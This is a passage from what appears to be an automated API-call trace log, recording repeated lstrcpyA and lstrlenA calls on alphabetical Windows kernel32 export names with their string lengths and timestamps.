lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.777] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.777] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.777] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.777] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.777] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.777] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.777] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.777] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.777] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.777] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.777] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.778] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.778] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.778] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.778] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.778] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.778] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.778] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.778] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.778] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.778] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.778] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.778] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.778] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.778] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.778] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.778] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.778] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.778] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.778] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.778] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.778] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.778] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.778] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.778] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.778] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.778] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.778] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.778] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.778] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.778] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.778] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.778] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.778] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.778] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.778] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.778] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.778] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.779] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.779] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.779] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.779] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.779] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.779] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.779] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.779] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.779] lstrlenA (lpString="BEEP") returned 4 [0079.779] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.779] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.779] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.779] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.779] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.779] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.779] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.779] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.779] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.779] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.779] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.779] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.779] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.779] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.779] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.779] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.779] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.779] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.779] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.779] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.779] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.779] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.779] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.779] lstrlenA (lpString="CANCELIO") returned 8 [0079.779] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.779] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.779] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.779] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.779] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.780] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.780] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.780] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.780] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.780] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.780] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.780] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.780] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.780] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.780] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.780] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.780] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.780] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.780] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.780] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.780] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.780] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.780] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.780] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.780] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.780] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.780] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.780] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.780] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.780] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.780] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.780] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.780] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.780] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.780] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.780] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.780] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.780] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.780] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.780] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.780] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.781] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.781] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.781] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.781] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.781] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.781] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.781] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.781] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.781] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.781] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.781] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.781] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.781] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.781] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.781] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.781] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.781] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.781] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.781] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.781] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.781] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.781] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.781] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.781] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.781] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.781] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.781] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.781] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.781] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.781] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.781] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.781] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.781] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.781] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.781] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.781] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.782] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.782] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.782] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.782] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.782] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.782] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.782] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.782] lstrlenA (lpString="COPYFILEA") returned 9 [0079.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.782] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.782] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.782] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.782] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.782] lstrlenA (lpString="COPYFILEW") returned 9 [0079.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.782] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.782] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.782] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.782] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.782] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.782] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.783] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.783] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.783] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.783] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.783] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.783] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.783] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.783] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.783] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.783] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.783] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.783] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.783] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.783] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.783] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.783] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.783] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.783] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.784] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.784] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.784] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.784] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.784] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.784] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.784] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.784] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.784] 